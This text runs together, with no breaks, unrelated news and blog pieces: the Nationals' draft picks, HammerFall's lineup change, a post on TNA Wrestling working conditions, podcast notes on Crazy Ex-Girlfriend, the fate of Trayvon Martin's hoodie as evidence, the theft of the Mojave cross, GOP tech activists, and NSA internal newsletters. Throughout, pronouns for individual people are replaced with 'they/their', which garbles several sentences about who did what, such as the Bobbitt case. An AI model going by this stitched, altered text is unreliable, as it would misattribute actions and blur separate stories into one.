In dismissing Romero , the Cougars dealt a significant — but obviously not fatal — blow to the draft status of a player that climbed as high as 10th on the Baseball America Top 100 Draft Prospects before this season . They are currently rated as the fifth-best lefty in this draft , and the 27th-best prospect overall . Romero was averaging 15.87 strikeouts per nine innings this season , which would have led Division I if Romero had pitched all season .
They finished their Houston career with a 2.43 ERA in 226 1/3 innings pitched . Romero 's strikeout stuff consists of a mid-90s fastball and wipeout slider that come from a three-quarters arm slot . In other words , while Romero was a starter in college , their stuff profiles to the bullpen immediately , and pretty much anywhere the Nationals would want to use them long-term .
Rizzo said the Nationals took the best player available , and did not draft Romero with the intention of moving them to the majors by the end of this season , despite the fact that some draft gurus speculated they were among the more major league-ready pitchers available .
“ I 've never done anything like that , where a drafted player gets to the big leagues the year you draft him , ” Rizzo said . “ I do n't expect that in this scenario . ”
But scouting director Kris Kline admitted Romero 's stuff “ plays in the big leagues right now . ”
“ Big fastball , wipeout breaking ball , good feel for their change-up , ” Kline said . “ A very competitive kid . ”
When and if the Nationals sign Romero , they will begin their career as a starter . But they have shown a willingness to shift promising starters to the bullpen before — see “ Fedde , Erick ” in the Nationals ' glossary . Washington is in need of help for its big league bullpen , this year and beyond , and chose a hard-throwing lefty with back-end-of-the-bullpen potential accordingly . They also chose to endure the inevitable questions about their first rounder 's character .
Whether Romero can help sooner than later remains to be seen , as does the amount of money the Nationals will pay him . They are unique in that they can not return to Houston after being dismissed from the team and therefore does not have much leverage in negotiations .
If they do not play for the Nationals , they will not have a college team to fall back on , so perhaps Romero can represent a financial value , too . Their slot carries a value of $ 2,530,400 . Romero is represented by Scott Boras , and they have been working out at Boras 's California facility for the last few weeks .
[ Boswell : Instead of seeking relief , Nationals ' bullpen should be begging for forgiveness ]
The Nationals shipped away two of their top pitching prospects in last winter 's deal for Adam Eaton , one that left them with very little big league ready talent to call on as their bullpen struggled this season . The top-rated pitching prospect in their system , Fedde , moved to the bullpen in May , a decision the Nationals made hoping Fedde might be able to help later this season . Koda Glover raced to the big leagues within a year of being drafted and was closing within a year and a half . They are now on the disabled list , and the Nationals are hunting for help .
They drafted more of it in the second round , selecting South Carolina right-hander Wil Crowe with the 65th pick overall . Crowe , South Carolina 's Friday night starter , fell to the Nationals in the second round likely due to more traditional concerns . Crowe had Tommy John surgery after the 2015 season , their sophomore year with the Gamecocks . They were a first-year student all-American in 2014 before pushing through elbow trouble in a disappointing 2015 season . They returned to pitch to a 3.41 ERA in 2017 and struck out 90 batters in 92 1/3 innings .
“ The fact that they got to us where they picked , I 'm extremely elated , ” said Kline , who pointed to Crowe 's mid-90s fastball as a key asset for the 6-2 righty . ” … He 's an ultracompetitive kid . Good track record . Profiles as a mid-rotation starter with secondary stuff . ”
The draft will continue with Rounds 3-10 on Tuesday and Rounds 11-40 on Wednesday .
As posted by HammerFall to their official Facebook page :
Life in a heavy metal band is indeed filled with twists and turns , highs and lows , ups and downs . On Monday , we rolled out our own whiskey , Legacy Of Kings . Today is a shocking and monumental day for all , HammerFall members and fans alike : Anders Johansson has decided to leave the band , after 15 years as the drummer . Brought on by increasing musical differences , as well as a career in the music industry that spans almost four decades , they have come to the conclusion that enough is enough . But fear not , we have already formulated a plan to get us through this even stronger . As a replacement we have found a most excellent drummer in David Wallin , who most notably has been beating the skins in the Swedish industrial force Pain . David will fill the void left by “ The Swedish Tank ” with their youthful intensity and fantastic musicianship during the upcoming tour . We wish Anders all the best in their future endeavours and hope that 15 years ca n't be erased that easily .
Also , basist Fredrik Larsson will have their second child in December , and is therefore on parental leave through March . But we think you will like the choice to fill their shoes . For anyone who is the least bit familiar with HF , this one needs no introduction : handling the 4-string duty in Fredrik 's absence , none other than former guitar player Stefan Elmgren has agreed to make a triumphant return to the band ! Yet another reason not to miss catching us live on the upcoming tours , this will be a very unique constellation . So it is with mixed emotions we say goodbye to an old friend and welcome an even older one back into the fold . The Swedish Templars of Steel can not and will not be subdued , we will carry on heeding the call as long as the crimson thunder still is flowing in our veins . It is not the end of anything , it 's the dawn of a new era . And we welcome it with our hammers high !
Comments
comments
CagesideSeats.com has a fascinating look at the inner workings of TNA Wrestling . This well documented report exposes TNA Wrestling as anything but the family friendly company that you would expect being run by a 46 year old mother of two .
Camel Clutch Blog contributor Brett Clendaniel alerted me of a very interesting article that has popped up online about TNA Wrestling and its working conditions . Ironically Tom just recently wrote a piece about TNA 's questionable working conditions here for Camel Clutch Blog . S. Bruce over at Cage Side Seats goes further , documenting a nine year history of working conditions that would make Kathie Lee Gifford proud .
I do n't want to re-write the entire article , but I do want to touch on a few major points of the piece . The piece documents numerous discrepancies between TNA 's policy in paying for their wrestler 's medical expenses and not . The article also documents the incredible differences in pay between men and women in the company and the hypocrisy of the company when it comes to working conditions . It is a heck of a piece and well worth going out of your way to read .
A few of the highlights that Mr. Bruce uncovers is for one , the settlement in the Konnan lawsuit . Former TNA star Konnan sued TNA Wrestling a few years back for racial discrimination and refusing to pay their medical bills . According to this article TNA actually settled with Konnan for a rumored $ 1 million ( hope they paid back some of those donations ) because of initial findings that the company did not want to get out .
Another big topic of the piece is the safety of the pro wrestlers in TNA Wrestling . According to the piece , Alex Shelley and Brian Kendrick were encouraged to perform a more high risk style , even though the company refuses to pay for most wrestlers ' medical bills . The company paid for Ron Killings ' surgery for an injury they received through a TNA booking and then demanded their money back , while the company reportedly paid for Scott Steiner 's surgery on the house . Dixie Carter allowed Eric Bischoff to pressure Rob Terry into taking an unprotected chair shot to the head , even though there is plenty of medical evidence pointing to chair shots to the head causing concussions . Angelina Love who is one of the biggest stars of the company says they worked a few days after receiving a concussion on a TNA show because they could n't afford time off . OSCHA , I think we have a problem .
The subject of pay is also brought up and whether the girls who wrestle in TNA are the victims of discrimination . The article points out that while the girls are consistently the highest ratings draw in the company , they are also some of the least paid girls on the roster . According to the piece , Awesome Kong was being paid $ 400 a match while Survivor star Johnny Fairplay made $ 300,000 for 40 minutes of work and Sting was being paid $ 10,000 per appearance . As unfair as that may sound , I do n't think the girls would have a case because I can almost bet Mickie James is making a nice nickel and Christy Hemme reportedly signed a $ 150,000 year contract a few years back . Sorry ladies .
One of the most humorous anecdotes and I am still laughing at this one goes back to the Voodoo Kin Mafia 's DX challenges a few years ago . To refresh your memories because if you are like me you barely remember what happened on TNA Impact last week , Brian Armstrong and Kip James issued a $ 1 million challenge to Triple H and Shawn Michaels to come to TNA and “ fight them. ” The kicker is that Dixie Carter allegedly set $ 1 million aside and was surprised that Degeneration X never showed up . Ah , to be a fly on the wall in Hogan and Bischoff 's office after a Dixie Carter booking meeting .
There is also a real interesting story regarding Ric Flair 's shenanigans a few weeks ago when they missed the bus on the European tour . According to the story , Flair told a friend that the company pressured Kurt Angle to stay on the tour after Kurt found out that their pregnant girlfriend went into labor and both they and the unborn baby were in serious danger . While Angle made it home in time , the company allegedly held them up from leaving which forced Kurt to arrive home much later than expected .
Check out the full Camel Clutch Blog Pro Wrestling and MMA store for videos , t-shirts , books , and more .
Hey , it 's a horrible story but it was just last week that Kurt Angle announced on Twitter that they are re-signing with TNA Wrestling and that they love Dixie Carter . If it does n't bother Kurt I guess it should n't bother anyone , but the Nature Boy was n't very happy to say the least .
The article goes on and on and chronicles other issues like reported drug use within the company , harassment , drug testing , the road schedule , and a lot more . It is certainly a scathing piece and one of the most comprehensive looks at the inner workings of TNA Wrestling over the last nine years .
I will conclude by saying this . While I think a lot of what is reported in the story is terrible , nobody is holding a gun to anyone 's head to work there ( although Vince Russo must have pictures on someone ) . At the end of the day everyone in TNA Wrestling knows what they are getting into when they step into the TNA rings and if they want to work under those conditions , I really do n't sympathize too much with them . I ca n't imagine anyone in TNA Wrestling being surprised the next time they get injured and receive a medical bill or shocked that Sting makes more than them .
There are other options out there . What did Gail Kim , Ron Killings , and Awesome Kong do ? They left the company . Only Kim had a deal in place when they left , as the other two just had enough . I guess the thought of losing $ 400 a week was n't too terrifying for Kong . Point being , that there are other options out there for pro wrestlers besides TNA . Even if the WWE is n't an option , there are international and independent options . And believe it or not , there are other options other than being a pro wrestler . It may not be fair , but again you know what you are getting into when you join TNA .
The medical bills issue has been a point of contention for some time in TNA . The WWE does pay the medical bills of injured WWE superstars . However , I never understood why none of the professional wrestlers from either company went ahead and pursued insurance through AFTRA . Heck , you have the WWE now calling themselves entertainment television and TNA wrestlers are performing on television every week . There are people that make a living doing television extra work sitting in the background that get AFTRA insurance so why ca n't a professional wrestler who puts in hours of television time per week ?
The author of the piece sent TNA Wrestling a few emails for comments . They got a very quick response from Terry Taylor but nothing more . I think it would be to TNA Wrestling 's benefit to either a ) respond to the story or b ) acknowledge it and improve their working conditions . Keep in mind that this is not your average independent pro wrestling company here . This is a company funded by Panda Energy , a multi-million or even billion dollar energy company . Heck , they found $ 1 million to pay two WWE wrestlers that do n't even wrestle there !
If you do n't believe any of this and while the writer backs up all of their claims with citations , just check out what Hulk Hogan wrote last week after Edge retired . Keep in mind that Hulk Hogan and Eric Bischoff probably work closer with Dixie Carter than anyone else in the company . When they signed with the company , Dixie Carter referred to them as a partner .
WWE superstar Edge retired last week because they were told that if they wrestled again , they could be paralyzed . Like Edge or not , that is pretty serious stuff and it was enough for Edge to hang them up . This is how “ Dixie 's assistant ” Hulk Hogan responded to the news on Twitter .
if any of the guys like me , Flair , Hardy , Andre , AA , Blanchard , orndoff , Henning would have listened to doctors we would have quit15yrsago – @ hulkhogan4real
I do n't know Edges working environment because they are a media company not a wrestling company . HH wrestlers work hurt ! – @ hulkhogan4real
What about Foley ! I bet EDGE still wants to keep wrestling , he 's one of the boys big time ! ! ! – @ hulkhogan4real
Think there is any pressure in TNA to work hurt ? “ Wrestlers work hurt ! ” This coming from the guy who now has to walk around with rods in their back while Edge is planning on climbing Mount Everest .
Will any of these issues change ? I think it will take more than a $ 1 million lawsuit by Konnan or an article online to do it . It is going to take a serious and I mean serious lawsuit from a current or former TNA star , an expose ' by a major news organization , public pressure on Panda Energy , a tragedy , or an outright revolt by the roster . Unless any of the above happens , as fans and viewers there is n't much you can do . If you disagree with it , do n't watch and make your statement through your lack of business . If you do watch , enjoy it and remember that these guys and girls are n't forced to be there .
I would also like readers to keep in mind that I am only commenting on what is in Cageside Seats ' article . I 'd recommend heading over to their site and leaving a comment if you have any issue with specifics from their article . In other words , do n't kill the messenger .
Read the full article at Cageside Seats for citations and more fun about the wonderful world of TNA Wrestling .
TNA : Best of the Bloodiest Brawls : Scars and Stitches
Order WWE WrestleMania 27 DVD
Brock Lesnar 's autobiography – Death Clutch : My Story of Determination , Domination , and Survival
Grab discounted WWE DVDs , merchandise , t -shirts , figures , and more from the WWE Shop on Amazon.com
( Visited 119 times , 1 visits today )
Eric G. Eric is the owner and editor-in-chief of the Camel Clutch Blog . Eric has worked in the pro wrestling industry since 1995 as a ring announcer in ECW and a commentator/host on television , PPV , and home video . Eric also hosted Pro Wrestling Radio on terrestrial radio from 1998-2009 . Check out some of Eric 's work on their IMDB bio and Wikipedia . Eric has an MBA from Temple University 's Fox School of Business . More Posts - Website Follow Me :
Heads up : if you 've seen this episode of Crazy Ex-Girlfriend , you know that the show and our discussion deals with some serious and scary moments . We keep a lot of it light , but do talk earnestly about the subject matter of this episode .
Every time we 've reached the pivotal episode this season ... Crazy Ex-Girlfriend delivers another gut punch . And we are so happy it does .
Suzanne , Amber and Tonya put on their comfiest velour tracksuits , tiaras and fairy wings to talk about episode 305 , `` I Never Want To See Josh Again ? ''
How many nicknames will the Whitefeather Associates come up with for Cornelia ? Did spark really fly between Rebecca and Jim and we missed it ? Is Naomi really making me cry for their strong maternal instincts ? Oh please please please can Rebecca be safe and reach out for hope and for help ?
We answer your questions , award our Giant Pretzels of the week and give our self-care recommendations for staying healthy and decidedly un-Bunch-like .
If you ever feel hopeless and need help -- or helpless and need hope -- the National Suicide Prevention Lifeline is always there for you , 24/7 , at 1-800-273-8255 . And if you want to learn more about how to support others , the National Suicide Prevention Lifeline is a great starting place .
SONGS :
Heinous Bitch ( Rachel Bloom , Jack Dolgen and Adam Schlesinger , performed by Rachel Bloom )
I Feel Like This Is n't About Me ( Rachel Bloom , Jack Dolgen and Adam Schlesinger , performed by Bayne Gibby and Mano Agapion )
Assistant state attorneys Richard Mantei , left , and John Guy hold up Trayvon Martin 's hoodie as evidence during George Zimmerman 's trial in Seminole circuit court in Sanford , Fla. Zimmerman was acquitted of second-degree murder in the 2012 shooting death of Martin .
June 25 , 2013 Assistant state attorneys Richard Mantei , left , and John Guy hold up Trayvon Martin 's hoodie as evidence during George Zimmerman 's trial in Seminole circuit court in Sanford , Fla. Zimmerman was acquitted of second-degree murder in the 2012 shooting death of Martin . Gary W. Green/State of Florida/Reuters
What becomes of the courtroom artifacts of our national obsessions , of our most prurient or most substantive crime-and-justice fixations ?
What becomes of the courtroom artifacts of our national obsessions , of our most prurient or most substantive crime-and-justice fixations ?
What becomes of the courtroom artifacts of our national obsessions , of our most prurient or most substantive crime-and-justice fixations ?
Sift everything . Sift the weeks of testimony , the theatrics , the recriminations , the tears . Sift the months of noisy commentary — the relentless , pounding , grating noise .
One image remains , clinging there to our consciousness . Sturdy , permanent , enduring , a distillation — a takeaway .
In the moment that the hoodie — Trayvon Martin 's hoodie — appeared in Courtroom 5D in Seminole County , Fla. , it was as if the air sluiced out the door . There was a breathless , aching stillness .
Prosecutors displayed the dark gray sweatshirt that Martin wore on the last night of their life in an enormous , rectangular , thickly three-dimensional frame . The hoodie lay suspended between clear plastic sheets with its arms spread wide inside a cross-shaped cutout , set starkly apart from the brilliant white of the matting . It might easily have been mistaken for a religious relic , even as it became a singularly evocative entry in a long inventory of indelible courtroom artifacts from O.J . Simpson 's ill-fitting gloves to Lorena Bobbitt 's emasculating kitchen knife . Prosecutors lifted the framed hoodie awkwardly , teetering toward the jury .
“ I get goose bumps just thinking about it , ” says Michael Skolnik , who sat next to Martin 's parents on that morning , the day before the Fourth of July . Skolnik , the political director for hip-hop mogul Russell Simmons and a member of the Trayvon Martin Foundation board , felt as if they were in the presence of something as consequential and iconic as Babe Ruth 's bat or the Declaration of Independence . “ It 's like this mythical garment , ” they say .
1 of 14 Full Screen Autoplay Close Skip Ad × Evolution of the hoodie View Photos Trayvon Martin 's death has sparked widespread interest ( and debate ) about the perceptions surrounding hoodies and those who wear them . It 's also become a protest symbol worn by those rallying in support of the unarmed teenager who was shot in a gated Florida community . Caption Trayvon Martin 's death has sparked widespread interest ( and debate ) about the perceptions surrounding hoodies and those who wear them . It 's also become a protest symbol worn by those rallying in support of the unarmed teenager who was shot in a gated Florida community last month . But the hoodie has had a long history , starting from its use by monks in the Middle Ages . In modern times , the hoodie has been used as a uniform , incorporated into high-end fashion for women and maintained an important presence in athletics and hip-hop culture . And a wide range of celebrities have been known to wear them . In `` Rocky , '' Sylvester Stallone famously ran up the steps of the Philadelphia Museum of Art in a hooded sweatshirt . John Bramley/MGM Buy Photo Wait 1 second to continue .
By then the hoodie was n't so much an exhibit in a murder trial as an idea , a cultural marker in an international conversation about race . And thus a question remains unanswered ever since that night of July 13 , when jurors acquitted George Zimmerman , a gung-ho neighborhood watchman and wannabe cop , of murder and manslaughter charges in the death of Martin : What will become of the hoodie ? What becomes of the courtroom artifacts of our national obsessions , of our most prurient or most substantive crime-and-justice fixations ?
Will it become a museum piece ? A ghoulish auction item ? An object of private grief ? A totem of rage ? A banner of healing ? Or could it disappear forever ?
An uneasy fascination
There can be something uncomfortable about our relationship with these pieces of criminal lore . We want them , do n't we ? But they make us uneasy . Keep them or lock them away ? Flash them or stash them ? Study them or exploit them ?
Web sites sell serial-killer memorabilia , and some sniff with disapproval . Museums have to check their intentions — are they sensationalizing or educating ? The Smithsonian passed up an opportunity to display the suit O.J . Simpson wore on the day of their acquittal ; the Newseum took it instead , tilting the focus toward the news coverage rather than the man . The Newseum also displayed the Unabomber 's tiny Montana cabin , which had been taken apart and reassembled . The exhibit was a hit , but at least one observer griped : the Unabomber himself .
At a storage facility in the Washington area , the Law Enforcement Memorial Fund has stocked the complete case record — thousands of pieces of evidence — from the investigation and trial of Washington area snipers Lee Boyd Malvo and John Allen Muhammad . The Bushmaster rifle and Chevrolet Caprice that the men used during a killing spree that terrorized the region will be included in a museum the fund is planning to open in 2015 . The idea is to educate the public and researchers about police investigative methods , the museum 's registrar , Vanya Scott , said .
John Wayne Bobbitt tried to make a fortune selling the 12-inch , red-handled kitchen knife that their wife , Lorena , used to slice off part of their penis in 1993 . A Prince William County judge would n't let them have it after their wife was acquitted of all criminal charges in 1994 . Lorena Bobbitt never asked for it , their attorney , Blair Howard , said in an interview . “ I think the last thing ever that they would want to retrieve is that knife , ” they said , “ She would want to put that behind her . ”
Howard had no idea what happened to the knife , so it only seemed logical to ask the court . As it turns out , there was no museum afterlife for Lorena Bobbitt 's weapon . The knife was ordered destroyed in July 2004 and was most likely incinerated , a court spokesperson said .
1 of 43 Full Screen Autoplay Close Skip Ad × Reaction to the George Zimmerman trial verdict View Photos From church pews to the broadcast airwaves , to tweets and hastily organized protests , Americans have reacted strongly to the news that George Zimmerman has been acquitted of all charges in the killing of teenager Trayvon Martin . Caption From church pews to the broadcast airwaves , to tweets and hastily organized protests , Americans have reacted strongly to the news that George Zimmerman has been acquitted of all charges in the killing of teenager Trayvon Martin . July 16 , 2013 At right , wearing a yellow cap , the Rev . Lee Johnson of the Tabernacle Missionary Baptist Church of Tallahassee , leads a group of protesters in prayer at the Capitol in Tallahassee , Fla. Dream Defenders organized a sit-in of Florida Gov . Rick Scott 's office in response to the “ not guilty ” verdict in the trial of George Zimmerman , the Florida neighborhood watch volunteer who fatally shot Trayvon Martin . Phil Sears/AP Buy Photo Wait 1 second to continue .
And what of the glove that O.J . Simpson struggled to wriggle their hand into during their 1995 murder trial in the deaths of their ex-wife , Nicole Brown Simpson , and their friend , Ron Goldman ? Might its muted existence provide a clue about the future of Martin 's hoodie ?
The glove was the subject of defense attorney Johnnie Cochran 's famed line : “ If it does n't fit , you must acquit. ” Now it lives inside a plastic evidence bag stowed in a vault at “ an undisclosed location ” in Los Angeles County , a spokesperson for the county district attorney 's office said .
The office knows of only one time that the glove was displayed publicly : at the Palms Resort casino in Las Vegas during the 2010 California Homicide Investigators Association meeting . It drew a crowd .
A hoodie 's travels
Trayvon Martin 's hoodie has been on a journey since the verdict , shuffled from one place to another , its final destination far from certain .
Prosecutors got it first . But they quickly passed it to the Sanford Police Department , the beleaguered law enforcement agency that came under caustic criticism for its initial decision not to charge Zimmerman . Protesters wore hoodies at massive rallies called to trash and shame the Sanford police ; now the police were back in possession of the symbolic core of the case .
There , in a secure room , officers had the elaborate frame disassembled . The hoodie was folded and repackaged in an evidence bag , according to a police spokesperson . Its arms were no longer spread wide .
Then it was on the move again , this time to the U.S. Justice Department . Last week , Sanford police packed several boxes of evidence and drove them to a Justice Department office in Orlando . In those boxes were a bag of Skittles and an AriZona brand fruit drink , the two items that Martin 's family so poignantly noted were the only things they were armed with on that rainy night in February 2012 when Zimmerman spotted them walking through a modest gated community in Sanford .
The Justice Department had ordered the evidence held while it conducts a civil rights investigation , an inquiry that current and former Justice officials say has little chance in resulting in charges . There may be other treks for the hoodie , a state of limbo encased in plastic . It could be used in a civil lawsuit , for instance . But at some point the legal proceedings will end , and the sweatshirt will find its way back to the Sanford Police Department . Martin 's family will be given a chance to collect it .
All sorts of evidence go uncollected . The police send expensive items such as cars and fancy bicycles to be auctioned , said Sanford police spokesperson James McAuliffe . The worthless stuff that no one claims gets destroyed ; there is n't room to store it all . That 's not something McAuliffe expects to happen to a hoodie that has been on magazine covers .
“ I do n't see that not being picked up , ” they said .
And so , at some undefined point in the future — it could be years — Martin 's parents will have a choice to make . And they 're certain to get plenty of advice .
Smithsonian interest
“ I would like to see it preserved , ” the Rev . Al Sharpton proclaimed into a cellphone on their way to a White House meeting about voting rights with President Obama .
Sharpton , more than any other person , might be responsible for bringing the Martin killing to trial . They organized the huge rally in Sanford that brought such pressure on Florida officials that the governor eventually appointed a special prosecutor to take on the case .
Sharpton is imagining what it would be like if we could see a snatch of clothing worn by Emmett Till , the 14-year-old who became a civil rights icon because they were killed after being accused of flirting with a white woman in the 1950s Mississippi . Martin is this generation 's Emmett Till , Sharpton says . They call the unarmed teenager 's death by a bullet that first pierced their hoodie , and then pierced their heart , the first civil rights flash point of the 21st century . And their hoodie is central to that distinction , an item of clothing that Sharpton says was used to profile Martin as a criminal . “ The hoodie now represents an image of an urban street kid that either embraces or engages in street thug life , ” they said . “ I think it 's unfair. ” By wearing hoodies at rallies , Sharpton says , they and others are seeking a redefinition .
Sharpton would like to see the hoodie reside one day at the National Museum of African American History and Culture now under construction on the Mall and expected to open in 2015 . The museum 's director , Lonnie Bunch , has assembled other pieces with legal themes . They acquired a guard tower from Louisiana 's notorious Angola State Penitentiary and the handcuffs used to restrain renowned African American scholar and Harvard professor Henry Louis Gates Jr. in an episode that sparked a national debate about race and led to a “ beer summit ” with Obama aimed at cooling passions .
Martin 's hoodie , Bunch said , represents a unique opportunity to further the discussion about race in America . ( And , by the way , he 'd love to have it for their collection once the legal case plays out . They also have their eye on the hoodie that Marian Wright Edelman , founder of the Children 's Defense Fund , wore in solidarity with protesters . )
“ It became the symbolic way to talk the Trayvon Martin case . It 's rare that you get one artifact that really becomes the symbol , ” Bunch said . “ Because it 's such a symbol , it would allow you to talk about race in the age of Obama . ”
Curators , they mused , could “ ask the bigger questions ” prompted by the case .
“ Are we in a post-racial age ? ” Bunch asked , dreaming about how the hoodie might help shape perceptions . Then they answered the question : “ This trial says , ‘ No . ' ”
RELATED :
Trayvon Martin 's death has put spotlight on perceptions about hoodies
Evolution of the hoodie
A short history of the hoodie
Josh White contributed to this report .
Enlarge AP file photo The Mojave Desert cross , the subject of a tense Supreme Court case in April , was stolen . @ FAITH_REASON ON TWITTER @ FAITH_REASON ON TWITTER Join the conversation : Religion , spirituality & ethics | Reader forum : Your beliefs LOS ANGELES  Private caretakers are vowing they will replace the steel cross honoring American war veterans that was stolen from its rocky base in the Mojave Desert less than two weeks after the Supreme Court ruled the memorial could remain on federal land . Wanda Sandoz , who with their husband , Henry , have maintained the cross and its predecessor for more than 25 years , said they were stunned to learn Monday that thieves had cut welded bolts and made off with the cross . `` Who would do such a thing ? '' they said . `` I ca n't imagine the type of person that would do this . I do n't know that type of person . '' The Veterans of Foreign Wars , which first placed a wooden cross on the rock in 1934 to honor troops killed in World War I , has offered a $ 25,000 reward for information leading to the conviction of those responsible for the theft . VFW National Commander Thomas Tradewell called the theft a `` desecration of a war memorial . '' `` The memorial will be rebuilt and the vandals will be caught and prosecuted in federal court , since the crime occurred on government property , '' they said . Sandoz said their husband plans to replace the cross , with the VFW 's help , with an exact replica of the one they installed in 1996 , when a previous version was vandalized . FAITH & REASON : Could a different 'memorial ' replace Mojave cross ? SUPREME COURT : Allow cross on public land in California TENSE ARGUMENTS : Justices divided over cross on park land The stolen cross was made of 4-inch steel pipe welded together into a 7-foot-tall cross and bolted into a rocky peak . The site is in California , about 200 miles northeast of Los Angeles . Linda Slater , spokesperson for the National Park Service , said workers at the Mojave National Preserve saw the cross in place Sunday afternoon and discovered it missing Monday morning . Its location is near a trailhead and a paved road where there is frequent foot and vehicle traffic , they said . `` I think everybody is shocked , '' Slater said . The cross has been the object of a lawsuit by plaintiffs who charged the religious symbol 's placement on federal land violated the U.S. Constitution 's separation of church and state . The Supreme Court , in a 5-4 ruling last month , refused to order its removal and referred the case back to a lower court . Congress is also trying to resolve the issue by transferring the memorial 's site into private hands . `` This was a legal fight that a vandal just made personal to 50 million veterans … and their families , '' Tradewell said . It was not immediately clear whether a replacement cross will be permitted . `` We 're waiting for news from the Department of Justice as to what we should do . The case is still in litigation , '' Slater told the Associated Press . Guidelines : You share in the USA TODAY community , so please keep your comments smart and civil . Do n't attack other readers personally , and keep your language decent . Use the `` Report Abuse '' button to make a difference . You share in the USA TODAY community , so please keep your comments smart and civil . Do n't attack other readers personally , and keep your language decent . Use the `` Report Abuse '' button to make a difference . Read more
There has long been a libertarian , leave-us-alone attitude coursing through Silicon Valley . But it has n't translated into political power for Republicans , as most conservative techies have locked themselves in a political closet of sorts — leery of coming out in a region dominated by Democrats .
But two young Bay Area conservative techies who hope to help the GOP compete with Democrats in the use of technology are trying to change those attitudes .
Garrett Johnson and Aaron Ginn have been cultivating a community of like-minded Bay Area techies through informal happy hours and get-togethers . At the same time , they 've got the ear of top California and national conservatives who are eager to hear their ideas .
They will begin their effort next month in San Francisco , hoping eventually to build the GOP 's use of the Internet beyond the Bay Area .
In June , their fledgling Lincoln Labs , an incubator for political tech ideas , will host a 24-hour hackathon . The goal is to encourage programmers to dream up digital ideas that use “ market-based solutions ( to ) address big social problems , ” according to an online invitation . Cash prizes will be awarded for the top ideas — as well as the opportunity to further develop them .
While the June 21-22 event is billed as nonpartisan and open to the public , it is being sponsored by the Charles Koch Institute — one of the two wealthy Koch brothers who have donated millions to conservative causes . The Kochs are among several top conservative leaders prowling Silicon Valley for digital talent .
Ginn , a member of GOP presidential candidate Mitt Romney 's digital team , is seen as a rising star by California Republican Party Vice Chairwoman Harmeet Dhillon , a San Francisco attorney who is leading the state party 's efforts to overcome its waning presence .
” The party needs a fresh perspective , and people like Aaron are providing it , ” Dhillon said . “ I hope people are listening to them . I know that I am listening to them . ”
Ginn , 25 , grew frustrated during their stint on the Romney team . Too often , they said , the political side of the campaign and its digital team did not work together . Recently , Ginn wrote a 13-page memo breaking down the challenges facing the GOP , many of them based on their Romney campaign experience , and sent it to national party leaders .
President Obama 's technology team achieved “ numerous success ( es ) by having clear operational values , a focus on developing high quality products , a unified system across vendors , a strong dependency on data and a high-quality in-house development team , ” wrote Ginn , director of growth for StumbleUpon , a San Francisco tech firm . “ Conversely , Romney for President 's efforts failed on nearly all of these fronts . ”
In its 2012 election post-mortem , a political autopsy called the “ Republican Growth and Opportunity Project , ” the Republican National Committee acknowledged that the party lagged behind Democrats in its online skill .
” Digital can simply no longer be an afterthought in our campaigns . It has to be embedded in every function and backed up with appropriate staffing and funding , ” the post mortem read .
Tech-savvy GOP operatives are frustrated with how few Republican candidates use social media .
” A lot of campaigns think social media outreach is posting a funny picture on Facebook or using a hashtag ( on Twitter ) , ” said Matt Shupe , who was the social media manager for Andy Vidak , a Republican who won a primary race this month for 16th state Senate District in the Bakersfield area .
Instead , Shupe said , GOP campaigns need to do a better job of mining information about voters from what 's on their Facebook pages , for example .
One reason Vidak received a large number of votes from non-Republicans in a district dominated by Democrats was that their campaign used digital outreach that “ you would n't see in your standard Republican campaign , ” Shupe said . They declined to detail that outreach because the race is too close to call .
GOP leaders say people such as Johnson , Ginn and Shupe , who soon will become executive director of the San Francisco Republican Party , are relatively rare among conservatives . Shupe acknowledged that many conservatives in the tech community are reluctant to talk politics at work .
Slightly less than 9 percent of San Francisco voters are registered Republicans , according to the California Secretary of State . It is slightly higher in San Mateo ( 19 percent ) and Santa Clara counties ( 22 percent ) .
” A lot of technology companies have a lot of very liberal people working for them , ” Shupe said . There 's a feeling , they added , that showing your conservative stripes at work could “ affect your employment situation or how your co-workers feel about you . ”
Johnson , 29 , a former staffer for former Florida Gov . Jeb Bush and co-founder of Menlo Park startup SendHub , said it does n't have to be that way . The independent , entrepreneurial spirit that drives Silicon Valley is a natural fit for conservative , free market ideals , they said .
It 's one reason why libertarian Sen. Rand Paul , R-Ky. , is likely to find a friendly reception when they tour Silicon Valley firms this week .
” Washington , D.C. , runs by the ideology of ‘ too big to fail . ' That is something that has been around for so long , and it 's so big that that 's just how it has to be , ” Johnson said .
” Silicon Valley is very different . We are about disruption and trying to build technology that brings things to scale faster with lower inputs , ” Johnson said . “ There 's a big disconnect there , and we 're trying hard to bridge that gap . ”
At the end of the 1992 Robert Redford movie Sneakers , a National Security Agency [ NSA ] official offers a team of hackers whatever they want in exchange for a piece of omnipotent code-breaking technology disguised as an answering machine . In this writer 's opinion , the film is the best movie to put the NSA at the center of its plot . A lot of flicks depict the agency as the CIA with a different name , but Sneakers focuses on the crux of the NSA 's work : capturing information in transmission , also known as signals intelligence . NSA spies do n't sneak bugs into diplomat 's offices . They use satellites .
But the movie also depicts the NSA as the sort of rogue intelligence agency Hollywood has taught us to imagine , one that wanted the technology as much to one-up the U.S. 's other secretive branches as to pursue its own work .
Edward Snowden has given us a clearer view of how much the agency does . We like to imagine spook organizations as if it 's not entirely clear if the government runs them or they run the government , but with a new release of materials on The Intercept , we also have a view into the culture inside these secretive offices . The document release contains the first year , 2003 , of the internal newsletter , SIDtoday , which covers everything from human resources announcements to profiles of different NSA departments .
A five-part series published in late April 2003 , called “ When Meeting the Customer Means Defending the Nation , ” depicts an agency eager to be of service to as many branches of government as it can . Reading through these articles offers insight into the personality of the institution that listens to us all , and , honestly , it sounds boring in there .
For example , when Maureen Baginski , head of the largest directorate within the NSA , left for a job at the FBI , SIDtoday announced a going away party , promising “ goodies. ” How about that James Bond lifestyle ?
‘ The core of our customer relationships is understanding and meeting our customers ' Information Needs . Those needs , as you all know , are myriad . '
Still , the customer service series rewards a close reading by anyone interested in the American surveillance state . As I read , I realized that I assumed that the NSA functioned like a bunch of well-resourced , self-directed experts , minding obscure channels . Then , one day a bespectacled but determined looking technocrat would pick up a phone and say , “ Mr . President , there 's a lot of chatter about a dirty bomb in Brasilia . ”
That 's not how these internal documents depict life inside , however , and they do n't have any particular reason to lie , because you and I were never meant to see these newsletters . Every single paragraph is preceded with initials indicating how classified it is . And so we did n't see them , not for 13 years .
In the first installment , a member of the NSA staff writes : “ The core of our customer relationships is understanding and meeting our customers ' Information Needs . Those needs , as you all know , are myriad . ”
The idea that other government departments are “ customers ” here is one that comes up again and again throughout these newsletters . The third installment reveals that the independent Federal Reserve requests information from the NSA . Also , the Department of Agriculture hardly ever made requests of the NSA before September 11 . After , it had endless questions .
